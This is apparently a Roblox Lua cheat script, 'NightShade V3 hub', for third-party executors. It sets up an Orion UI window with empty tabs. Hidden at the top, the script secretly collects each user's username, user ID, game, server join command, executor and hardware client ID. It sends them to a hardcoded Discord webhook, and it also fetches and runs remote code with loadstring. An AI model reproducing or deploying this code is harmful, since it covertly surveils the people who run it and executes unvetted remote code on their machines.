print("NightShade is presented to you by, ChaddestCat#1981, marker#3209, and Crow?#9001")
repeat task.wait() until game:IsLoaded()

local Webhook = "https://discord.com/api/webhooks/1081000418185850880/_HOjXAEax5wsk6isSkVHv5PiDDD50p-maOUO59j6ERzQjAwtHqo443pJvjc4yHgQt94w" -- your webhook here
_G.Discord_UserID = "" -- ID To Ping on every execution, blank if no one wants to be pinged.

local player = game:GetService("Players").LocalPlayer
local joinTime = os.time() - (player.AccountAge*86400)
local joinDate = os.date("!*t", joinTime)
local premium = false
local alt = true
local JobId = '```game:GetService("TeleportService"):TeleportToPlaceInstance('..game.PlaceId..', "'..game.JobId..'")```'

local executor = identifyexecutor() or "Unknown Executor"
local Thing = game:HttpGet(string.format("https://thumbnails.roblox.com/v1/users/avatar?userIds=%d&size=180x180&format=Png&isCircular=true", game.Players.LocalPlayer.UserId))
Thing = game:GetService("HttpService"):JSONDecode(Thing).data[1]
local AvatarImage = Thing.imageUrl
local message = {
   ["username"] = "Nighshade Hub",
   ["avatar_url"] = "https://cdn.discordapp.com/attachments/868496249958060102/901884186267365396/ezgif-2-3c2a2bc53af1.gif",
   ["icon_url"] = "https://cdn.discordapp.com/avatars/781051635928531015/44e0cbf2641b3804a56e55eb2164f1c5.png",
   ["content"] = ( _G.Discord_UserID ~= "" and  _G.Discord_UserID ~= nil) and tostring("<@".._G.Discord_UserID..">") or " ",
   ["embeds"] = {
       {
           ["color"] = tonumber(tostring("7493233")), --decimal
           ["title"] = "Execution Has Been Detected",
           ["thumbnail"] = {
               ["url"] = AvatarImage,
           },
           ["fields"] = {
                {
                   ["name"] = "Username",
                   ["value"] = ""..player.Name.."",
                   ["inline"] = true
                },
                {
                   ["name"] = "Display Name",
                   ["value"] = player.DisplayName,
                   ["inline"] = true
                },
                {
                   ["name"] = "User ID",
                   ["value"] = "["..player.UserId.."](" .. tostring("https://www.roblox.com/users/" .. game.Players.LocalPlayer.UserId .. "/profile")..")",
                   ["inline"] = true
                },
                {
                   ["name"] = "Game ID",
                   ["value"] = "["..game.PlaceId.."](" .. tostring("https://www.roblox.com/games/" .. game.PlaceId) ..")",
                   ["inline"] = true
                },
                {
                   ["name"] = "Game Name",
                   ["value"] = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name,
                   ["inline"] = true
                },
                {
                   ["name"] = "Executor",
                   ["value"] = executor,
                   ["inline"] = true
                },
                
				{
				   ["name"] = "Server ID",
				   ["value"] = JobId,
				   ["inline"] = true
				},
				{
				   ["name"] = "Hardware ID",
                   ["value"] = game:GetService("RbxAnalyticsService"):GetClientId(),
				   ["inline"] = true
				},
                {
                    ["name"] = "Creator",
                    ["value"] = "ChaddestCat#1981",
                    ["inline"] = true
                }
           },
           ['timestamp'] = os.date("%Y-%m-%dT%X.000Z")
       }
   }
}

request = http_request or request or HttpPost or syn.request
request({Url = Webhook, Method = "POST", Headers = {["Content-Type"] = "application/json"}, Body = game.HttpService:JSONEncode(message)})
local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/shlexware/Orion/main/source')))()
OrionLib:MakeNotification({
	Name = "Loading!",
	Content = "Loading....",
	Image = "rbxassetid://12726726148",
	Time = 5
})

local Window = OrionLib:MakeWindow({
			Name = "NightShade V3",
			HidePremium = false, 
			SaveConfig = true, 
			ConfigFolder = "NightShadeV3",
			IntroEnabled = true,
			IntroText = "NightShade Hub",
			IntroIcon = "rbxassestid://12726726148",
			Icon = "rbxassetid://12726726148"
			})
OrionLib:MakeNotification({
	Name = "Loaded!",
	Content = "NightShade v3 has loaded",
	Image = "rbxassetid://12726726148",
	Time = 5
})

--Tabs			
local General = Window:MakeTab({
	Name = "General",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
local A = Window:MakeTab({
	Name = "A",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
local B = Window:MakeTab({
	Name = "B",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
local C = Window:MakeTab({
	Name = "C",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
local D = Window:MakeTab({
	Name = "D",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
local E = Window:MakeTab({
	Name = "E",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
local F = Window:MakeTab({
	Name = "F",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
local G = Window:MakeTab({
	Name = "G",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
local H = Window:MakeTab({
	Name = "H",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
local I = Window:MakeTab({
	Name = "I",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
local J = Window:MakeTab({
	Name = "J",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
local K = Window:MakeTab({
	Name = "K",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
local L = Window:MakeTab({
	Name = "L",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
local M = Window:MakeTab({
	Name = "M",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
local N = Window:MakeTab({
	Name = "N",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
local O = Window:MakeTab({
	Name = "O",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
local P = Window:MakeTab({
	Name = "P",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
local Q = Window:MakeTab({
	Name = "Q",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
local R = Window:MakeTab({
	Name = "R",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
local S = Window:MakeTab({
	Name = "S",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
local T = Window:MakeTab({
	Name = "T",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
local U = Window:MakeTab({
	Name = "U",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
local V = Window:MakeTab({
	Name = "V",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
local W = Window:MakeTab({
	Name = "W",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
local X = Window:MakeTab({
	Name = "X",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
local Y = Window:MakeTab({
	Name = "Y",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
local Z = Window:MakeTab({
	Name = "Z",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})


--Script
